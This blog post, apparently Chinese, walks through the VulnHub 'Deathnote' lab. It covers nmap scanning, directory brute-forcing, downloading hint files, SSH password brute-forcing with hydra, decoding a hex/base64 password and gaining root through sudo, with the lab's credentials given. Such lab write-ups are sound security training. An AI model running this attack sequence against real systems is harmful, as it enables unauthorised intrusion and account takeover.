博客 / 詳情

返回

vulnhub靶場Deathnote

Deathnote

主機發現

本地虛擬機部署,攻擊機kali(IP:172.16.16.101)

sudo nmap -sn -T4 172.16.16.0/24

image-20260210171132062

發現目標機IP(172.16.16.103)

新建文件夾,並進入目錄,用來存儲掃描結果

mkdir -p ~/vulnhub/deathnote/nmap_output

端口掃描

TCP掃描

cd ~/vulnhub/deathnote
sudo nmap --min-rate 10000 -p- 172.16.16.103 -oA nmap_output/ports

image-20260210185305574

詳細信息掃描

sudo nmap -sS -n -Pn -p 22,80,1 -sV -sC -O 172.16.16.103 -oA nmap_output/detail

image-20260210191433361

UDP掃描

sudo nmap -sU --top-ports 100 172.16.16.103 -oA nmap_output/udp

image-20260210191908756

漏洞腳本掃描

sudo nmap --script=vuln -p22,80 172.16.16.103 -oA nmap_output/vuln

image-20260210210132040

信息總結

目標主機172.16.16.103
開放TCP端口22,80端口
22/tcp   ssh	OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   http	Apache httpd 2.4.38 ((Debian))
系統版本
Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)		# OpenWrt是一個開源linux系統,主要用於路由器等嵌入式設備
UDP端口目前無實際利用價值
默認腳本漏洞掃描無可用結果
但是80端口暴露出 /wordpress/	/robots.txt		/wordpress/wp-login.php		/manual/	等文件或目錄

WEB

http://172.16.16.103

image-20260211104500709

訪問後似乎發生了跳轉,且網頁有些異常,啓動burpsuite查看

image-20260211105638844

直接跳轉域名deathnote.vuln

添加本機hosts,將域名deathnote.vuln指向172.16.16.103

sudo echo '172.16.16.103 deathnote.vuln' >> /etc/hosts

或:

sudo sed -i '1i 172.16.16.103 deathnote.vuln' /etc/hosts

image-20260211114934852

重新訪問,跳轉到WordPress正常頁面

image-20260211132408123

目錄掃描

gobuster

gobuster dir -u http://deathnote.vuln/wordpress/ -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x php,txt,jsp,asp,zip,tar,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

image-20260211140948391

feroxbuster

feroxbuster -u http://deathnote.vuln/ -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x txt -d 0 -s 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

image-20260211170241355

image-20260211170722921

feroxbuster工具可能不適合這種場景,無法過濾非txt後綴的文件,要麼需要添加正則去篩選,比較麻煩

查看各種已掃描到的網頁,提示去找notes.txt或者去看L的評論

image-20260211170003106

image-20260227153724585

雖然知道notes.txt文件名,但是不知道具體在哪個路徑,所以需要考慮遞歸爆破,還要過濾其他文件

我對比了10款常用的目錄爆破工具,發現目前的場景最適合的工具是ffuf或者dirsearch

具體的10款常用的目錄爆破工具各自的特點和適用場景,請看我另一篇隨筆

https://www.cnblogs.com/syslogd/p/19607360

dirsearch

python dirsearch.py -r -u http://deathnote.vuln

經過幾個小時的等待,發現一些有意思的路徑

image-20260213201947266

http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt

http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/

這個路徑可能有東西

image-20260213202232748

image-20260213202344667

image-20260213202409940

根據上面nmap掃描的ssh端口,可以判定走ssh爆破

先存儲這兩個文件

wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

image-20260213204435732

結合WEB頁面的信息,推測L和KIRA都可能是用户

SQL注入

/wordpress/wp-login.php

image-20260304121620310

經過幾輪注入,發現注入失敗,可能沒有注入漏洞

ssh爆破

hydra

hydra -t4 -L ~/vulnhub/deathnote/user.txt -P ~/vulnhub/deathnote/notes.txt ssh://172.16.16.103 

image-20260213204541533

login:l   password:death4me

ssh登錄

ssh l@172.16.16.103
death4me

image-20260213205129696

user_flag

image-20260213210038699

一串未知的字符

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.

丟個AI解釋説是Brainfuck語言編寫的程序,輸出結果為:i think u got the shell, but you wont be able to kill me -kira

image-20260213210241177

sudo權限查看

sudo -l
death4me

image-20260227144245082

無權限

用户信息

cat /etc/passwd
ls -al /home

image-20260227144927899

能夠登陸的有:root kira L

翻找文件

/opt/L/fake-notebook-rule

該目錄下有2個文件case.wav hint("提示")

image-20260303162451864

查看文件類型

file case.wav hint

image-20260303162635822

都是ASCII字符

查看文件內容

cat case.wav

image-20260303162746346

一串16進制字符

xxd轉換字符

echo |cat case.wav |xxd -r -p

image-20260303162912725

很像base64

base64解碼

echo |cat case.wav |xxd -r -p |base64 -d

image-20260303163105831

可能是kira用户的密碼:kiraisevil

嘗試登錄

ssh kira@172.16.16.103
kiraisevil

成功登錄kira用户

image-20260303163836977

user2_flag

image-20260303164536818

base64轉換

echo |cat kira.txt |base64 -d

image-20260303164644073

/opt/目錄剛才已經查看了,/var/目錄下面有什麼?Misa又是誰?

回看靶機的名字:deathnote,死亡筆記

Misa正是日本漫畫《死亡筆記》女主角,由平野綾配音,被粉絲稱為MisaMisa

image-20260303165137501

進入/var/目錄

image-20260303165312137

查看文件

image-20260303165402985

image-20260303165418561

shadow備份文件沒有讀取權限

提權

sudo提權

查看sudo權限

sudo -l
kiraisevil

image-20260303165702590

(ALL : ALL) ALL 表示可以以root權限執行所有命令

所以直接進行提權到root

sudo su

image-20260303170022846

root_flag

image-20260303170219685

user avatar
0 位用戶收藏了這個故事!

發佈 評論

Some HTML is okay.